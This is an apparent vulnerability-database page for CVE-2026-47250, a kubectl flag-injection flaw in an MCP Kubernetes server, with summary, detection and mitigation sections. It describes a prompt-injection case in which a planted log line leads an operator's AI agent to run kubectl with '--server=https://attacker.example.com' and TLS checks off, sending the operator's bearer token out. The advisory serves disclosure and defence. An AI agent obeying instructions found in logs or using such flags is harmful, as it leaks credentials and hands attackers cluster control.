CVE-2026-47250
Deferred Deferred - Pending Action

Privilege Escalation in mcp-server-kubernetes via kubectl Flag Injection

Vulnerability report for CVE-2026-47250, including description, CVSS score, EPSS score, affected products, exploitability, helpful resources, and attack-flow context.

Publication date: 2026-06-11

Last updated on: 2026-06-11

Assigner: GitHub, Inc.

Description

mcp-server-kubernetes is a Model Context Protocol server for Kubernetes cluster management. Prior to version 3.7.0, the kubectl_generic tool in mcp-server-kubernetes passes user-supplied flags directly to kubectl without any allowlist, enabling a privilege escalation attack within Kubernetes environments. An attacker who already has limited cluster or codebase access, for example, a developer with pod-deployment permissions but not cluster-admin credentials, can plant a single structured JSON line in an application's log output. When an operator with a privileged kubeconfig uses the MCP server to read those logs and their AI agent follows the injected instruction, kubectl_generic is called with --server=https://attacker.example.com and --insecure-skip-tls-verify=true. kubectl sends all API requests, including the Authorization: Bearer <token> header from the operator's kubeconfig to the attacker's endpoint. The captured token can then be replayed directly against the real Kubernetes API server, granting the attacker the full RBAC permissions of the operator's service account. This issue has been patched in version 3.7.0.

CVSS Scores

EPSS Scores

Probability:
Percentile:

Meta Information

Published
2026-06-11
Last Modified
2026-06-11
Generated
2026-07-02
AI Q&A
2026-06-12
EPSS Evaluated
2026-06-30
NVD
EUVD

Affected Vendors & Products

Showing 2 associated CPEs
Vendor Product Version / Range
flux159 mcp-server-kubernetes to 3.7.0 (exc)
flux159 mcp-server-kubernetes 3.6.2

Helpful Resources

Exploitability

CWE
CWE Icon
KEV
KEV Icon
CWE ID Description
CWE-88 The product constructs a string for a command to be executed by a separate component in another control sphere, but it does not properly delimit the intended arguments, options, or switches within that command string.

Attack-Flow Graph

AI Quick Actions

Instant insights powered by AI
Executive Summary

CVE-2026-47250 is a vulnerability in the kubectl-generic tool within the mcp-server-kubernetes package (versions 3.6.2 and earlier). The tool passes user-supplied flags directly to kubectl without any validation or allowlist, enabling an attacker to inject malicious flags.

An attacker with limited access, such as a developer with pod-deployment permissions, can insert a specially crafted JSON line into an application's log output. When a privileged operator reads these logs using the MCP server and their AI agent follows the injected instruction, kubectl-generic executes with flags that redirect API requests to an attacker-controlled server.

This causes the operator's Kubernetes bearer token to be sent to the attacker, who can then use it to gain the full RBAC permissions of the operator's service account, effectively escalating their privileges within the Kubernetes environment.

Impact Analysis

This vulnerability can lead to privilege escalation within Kubernetes environments. An attacker with limited initial access can capture the bearer token of a privileged operator by injecting malicious flags into logs.

With the stolen token, the attacker can impersonate the operator and gain full RBAC permissions, potentially allowing them to control or manipulate the Kubernetes cluster beyond their original access level.

This can result in unauthorized access to sensitive resources, disruption of services, or further compromise of the cluster.

Detection Guidance

This vulnerability involves the injection of malicious flags into the kubectl_generic tool via logs that are then executed by a privileged operator. Detection would involve monitoring for unusual kubectl commands or network requests that redirect API calls to unknown or attacker-controlled endpoints.

Specifically, look for kubectl commands executed with flags such as --server=https://attacker.example.com and --insecure-skip-tls-verify=true, which indicate possible exploitation attempts.

Network detection can include monitoring outbound HTTPS requests from kubectl to unexpected external servers, especially those that include Authorization: Bearer tokens in headers.

Suggested commands to detect suspicious activity might include:

  • Checking running processes or command history for kubectl invocations with unusual flags: `ps aux | grep kubectl` or `history | grep kubectl`
  • Using network monitoring tools to detect outbound connections to unknown servers on HTTPS ports, e.g., `netstat -anp | grep ESTABLISHED` or `tcpdump -i any port 443`
  • Inspecting logs for injected JSON lines or suspicious entries that might contain flag injections.
Mitigation Strategies

The primary mitigation is to upgrade mcp-server-kubernetes to version 3.7.0 or later, where this vulnerability has been patched.

Until the upgrade can be applied, restrict access to the MCP server and limit the privileges of users who can deploy pods or access logs to reduce the risk of exploitation.

Additionally, monitor and audit kubectl commands executed by operators to detect any unusual flag usage or connections to unknown endpoints.

Compliance Impact

The vulnerability in mcp-server-kubernetes allows an attacker to escalate privileges and exfiltrate Kubernetes bearer tokens from privileged operators. This leads to unauthorized access to sensitive cluster resources and data.

Such unauthorized access and token exposure can result in breaches of confidentiality and unauthorized data access, which may violate compliance requirements under standards like GDPR and HIPAA that mandate strict controls on access to sensitive data and protection of personal information.

Therefore, exploitation of this vulnerability could compromise compliance with these regulations by enabling attackers to access or manipulate protected data without proper authorization.

Chat Assistant

Ask questions about this CVE
Hi! I’m here to help you understand CVE-2026-47250. Ask me anything about the vulnerability, its impact, or mitigation strategies.
0/70

EPSS Chart